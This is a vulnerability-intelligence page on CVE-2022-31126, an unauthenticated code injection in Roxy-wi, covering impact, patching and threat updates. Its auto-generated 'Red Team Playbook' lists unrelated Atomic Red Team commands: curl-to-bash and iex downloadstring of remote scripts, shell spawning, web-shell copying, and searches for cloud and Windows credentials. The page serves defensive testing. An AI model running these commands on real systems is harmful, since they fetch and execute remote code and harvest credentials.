CVE-2022-31126
Overview
This vulnerability is a code injection flaw rooted in improper input validation within the Roxy-wi web interface. Specifically, the /app/options.py component fails to sanitize HTTP request parameters, enabling malicious input to be interpreted as executable code. The affected feature is the web management interface that handles server configuration options for Haproxy, Nginx, Apache, and Keepalived.
Vulnerability Description
Roxy-wi is an open source web interface for managing Haproxy, Nginx, Apache and Keepalived servers. A vulnerability in Roxy-wi allows a remote, unauthenticated attacker to code execution by sending a specially crafted HTTP request to /app/options.py file. This affects Roxy-wi versions before 6.1.1.0. Users are advised to upgrade. There are no known workarounds for this issue.
Impact
An unauthenticated remote attacker can execute arbitrary code on the server running Roxy-wi by sending crafted HTTP requests, enabling full control over the affected system. This can lead to unauthorized data access, service disruption, or lateral movement within the network. The attack requires only network access to the Roxy-wi web interface and no user interaction, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N, making exploitation straightforward and highly impactful.
Solution
Users of Roxy-wi should upgrade to version 6.1.1.0 or later, as detailed in the official GitHub security advisory (https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9). No workarounds are available, so applying the vendor-released patch is the only recommended remediation to address this critical code injection vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Roxy-wi arises from improper handling of user input within the application, specifically in the /app/options.py file. This flaw allows an attacker to craft a malicious HTTP request that can lead to arbitrary code execution on the server. The root cause of this vulnerability lies in the lack of adequate input validation and sanitization, which enables the execution of unintended commands. As a result, an unauthenticated attacker can exploit this weakness without needing any credentials, making it particularly dangerous. The affected versions of Roxy-wi prior to 6.1.1.0 are susceptible to this issue, highlighting the importance of maintaining updated software to mitigate risks.
The attack vector for this vulnerability is straightforward, as it relies on the ability to send specially crafted HTTP requests to the vulnerable endpoint. An attacker could leverage tools such as cURL or custom scripts to automate the exploitation process. Once the malicious request is sent, the server may execute arbitrary code, allowing the attacker to gain control over the system. This exploitation can lead to various outcomes, including data theft, installation of malware, or even complete system compromise. The ease of exploitation, combined with the requirement for no authentication, significantly increases the likelihood of successful attacks against vulnerable installations.
The real-world impact of this vulnerability can be severe, especially for organizations that rely on Roxy-wi for managing critical web server infrastructure. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential financial losses due to downtime or data breaches. Furthermore, the reputational damage associated with a security incident can have long-lasting effects on customer trust and business relationships. Organizations that fail to address this vulnerability may also face regulatory repercussions, particularly if they handle sensitive personal information. The high CVSS score of 9.8 underscores the urgency for organizations to take this threat seriously.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the latest version of Roxy-wi, as the developers have addressed this issue in version 6.1.1.0. Regular software updates are a fundamental aspect of a robust security posture, as they often include patches for known vulnerabilities. Additionally, organizations should implement web application firewalls (WAFs) to filter and monitor HTTP requests, which can help identify and block malicious traffic before it reaches the application. Conducting regular security assessments and penetration testing can also aid in identifying potential weaknesses in the application and its configuration.
In conclusion, the vulnerability in Roxy-wi presents a significant threat to organizations utilizing this open-source web interface for server management. The potential for remote code execution by unauthenticated attackers poses a critical risk that must be addressed promptly. By adopting proactive detection and mitigation strategies, including timely software updates and enhanced security measures, organizations can protect themselves against this and similar vulnerabilities, thereby safeguarding their infrastructure and sensitive data from malicious actors.
CSURFACE threat intelligence has identified a slight increase in activity related to CVE-2022-31126, indicating a modest uptick in attempts to exploit the unauthenticated remote code execution vulnerability in Roxy-wi versions prior to 6.1.1.0. Although the overall trend remains stable with a marginal decline in the EPSS score, the observed rise in detection signals suggests that threat actors continue to probe affected environments, potentially refining their tactics or expanding targeting scope. This development underscores the persistent attractiveness of this vulnerability for adversaries seeking initial access or lateral movement within infrastructure managed by Roxy-wi. For defenders, the subtle surge in exploitation attempts signals the need for heightened monitoring and reinforces the criticality of timely patching, as even small increases in activity can presage broader campaigns or opportunistic intrusions. While the risk level remains critical due to the vulnerability’s inherent severity and ease of exploitation, the current telemetry highlights a dynamic threat landscape where vigilance must be maintained to detect emerging exploitation patterns promptly.
Update 2 — August 20, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the Roxy-wi vulnerability, accompanied by a corresponding rise in the Exploit Prediction Scoring System (EPSS) score. This uptick reflects growing adversary interest and activity, signaling that threat actors continue to probe for opportunities to leverage this critical remote code execution flaw. Although the EPSS trend has stabilized recently, the elevated score places this vulnerability near the highest percentile of predicted exploitation likelihood, underscoring its attractiveness for attackers. For defenders, this evolving pattern highlights the persistence of exploitation efforts and the potential for expanded attack campaigns, especially given the vulnerability’s unauthenticated access vector and lack of effective workarounds. Consequently, the threat level remains critical, with the current telemetry reinforcing the necessity for sustained vigilance and proactive detection measures to identify and respond to emerging exploitation attempts promptly.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Roxy-Wi | Roxy-Wi | All |
cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) | Nuri Çilengir | webapps | python | - | View |
Threat Feed
18 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-31126 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9 |